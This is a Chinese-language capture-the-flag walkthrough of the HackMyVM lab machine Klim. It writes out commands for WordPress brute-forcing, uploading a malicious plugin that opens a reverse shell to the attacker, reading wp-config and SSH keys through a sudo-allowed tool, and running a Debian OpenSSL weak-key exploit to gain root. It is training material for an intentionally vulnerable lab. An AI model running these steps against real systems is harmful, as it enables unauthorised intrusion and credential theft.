渗透测试靶机练习No.79 Klim

admin 2022年4月20日09:16:07评论92 views字数 2256阅读7分31秒阅读模式

渗透测试靶机练习No.79 Klim

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=Klim
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx

靶场: HackMyVm.eu

靶机名称: Klim

难度: 中等

发布时间: 2021年7月27日

提示信息:

目标: user.txt和root.txt


实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only


信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo arp-scan -I eth1 10.0.0.0/24

渗透测试靶机练习No.79 Klim

扫描到主机地址为10.0.0.144

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.144 -oN nmap.log

渗透测试靶机练习No.79 Klim

扫描到开放22和80端口,先来看看80端口

Web渗透

渗透测试靶机练习No.79 Klim

访问后是Apache的默认页面,来做个目录扫描

dirsearch  -u http://10.0.0.144

渗透测试靶机练习No.79 Klim

发现wordpress应用程序,访问看看

http://10.0.0.144/wordpress/

渗透测试靶机练习No.79 Klim

访问后确认是wordpress,使用wpscan扫描漏洞

wpscan --url http://10.0.0.144/wordpress  --api-token 你的api -e

渗透测试靶机练习No.79 Klim

未发现可利用漏洞,发现klim用户。暴破这个账号

wpscan --url http://10.0.0.144/wordpress  --api-token 你的API -P /usr/share/wordlists/rockyou.txt -U klim


利用暴破密码时间对wordpress目录做目录扫描

dirsearch  -u http://10.0.0.144/wordpress

渗透测试靶机练习No.79 Klim

扫描到上传目录,来访问下

http://10.0.0.144/wordpress/wp-content/uploads/

渗透测试靶机练习No.79 Klim

两个目录,看看有没有敏感信息

渗透测试靶机练习No.79 Klim

发现一张图片,下载下来检查下

wget http://10.0.0.144/wordpress/wp-content/uploads/2021/07/image.jpg
file image.jpg
stegseek image.jpg

渗透测试靶机练习No.79 Klim

下载后使用file检查是正常的图片文件,更换StegSeek检查后得到一个密码及image.jpg.out文件。来看一下image.jpg.out内容

渗透测试靶机练习No.79 Klim

打开后发现是HTTP的数据包,并且得到一个密码,现在拿到两个密码了,尝试登录后台

渗透测试靶机练习No.79 Klim

使用HTTP数据包中的密码登录成功(注意URL编码),尝试修改模板拿到一个shell

渗透测试靶机练习No.79 Klim

打开模板修改页面后发现这个版本不能直接修改模板,那我们可以上传个恶意插件来拿到shell

工具下载地址:

https://github.com/wetw0rk/malicious-wordpress-plugin

1。生成恶意插件

python3 wordpwn.py 10.0.0.3 4444 Y

执行后会自动生成malicious.zip,并帮你打开msf监听4444端口

渗透测试靶机练习No.79 Klim

渗透测试靶机练习No.79 Klim

现在我们来上传恶意插件

渗透测试靶机练习No.79 Klim

渗透测试靶机练习No.79 Klim

渗透测试靶机练习No.79 Klim

执行shell

curl http://10.0.0.144/wordpress/wp-content/plugins/malicious/wetw0rk_maybe.php

渗透测试靶机练习No.79 Klim

反弹成功,来查找敏感信息

cd ../../../
cat wp-config.php

渗透测试靶机练习No.79 Klim

找到数据库账号密码,继续找

渗透测试靶机练习No.79 Klim

发现普通用户klim,继续找

sudo -l

渗透测试靶机练习No.79 Klim

发现可以使用klim用户身份执行/home/klim/tool文件,来看下这个文件是做什么的

ls -al /home/klim/tool

渗透测试靶机练习No.79 Klim

strings /home/klim/tool

渗透测试靶机练习No.79 Klim

发现程序执行了cat命令,那我们尝试读取id_rsa文件

sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa

渗透测试靶机练习No.79 Klim

读取成功,保存下来尝试登录 SSH

vi id_rsa
chmod 600 id_rsa
ssh [email protected] -i id_rsa

渗透测试靶机练习No.79 Klim

登录成功,先来看看flag

ls -al
cat user.txt

渗透测试靶机练习No.79 Klim

拿到user.txt,查找敏感信息

cd /opt
ls -al
cat id_rsa.pub

渗透测试靶机练习No.79 Klim

在/opt目录下找到root的公钥,公钥对我们来说没什么用处,但是生成他的openssl有能会存在漏洞,先来看一下openssl版本

openssl version

渗透测试靶机练习No.79 Klim

这是个老版本漏洞叫心脏滴血,来找一下exp

渗透测试靶机练习No.79 Klim

这三个应该都可以用,挑一个最新的看下内容

渗透测试靶机练习No.79 Klim

执行这个EXP需要3部,来验证一下

1。攻击机下载5622.tar.bz2并解压

mkdir keys
cd keys
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar -zxvf 5622.tar.bz2

渗透测试靶机练习No.79 Klim

2。下载exp脚本

wget https://www.exploit-db.com/download/5720
mv 5720 exp.py

3。执行exp

python2 exp.py keys/rsa/2048/ 10.0.0.144 root 22 5

渗透测试靶机练习No.79 Klim

成功拿到key文件,登录验证

渗透测试靶机练习No.79 Klim

登录成功,拿到root.txt,游戏结束。

渗透测试靶机练习No.79 Klim

渗透测试靶机练习No.79 Klim


原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.79 Klim

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日09:16:07
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习No.79 Klimhttp://cn-sec.com/archives/926589.html

发表评论

匿名网友 填写信息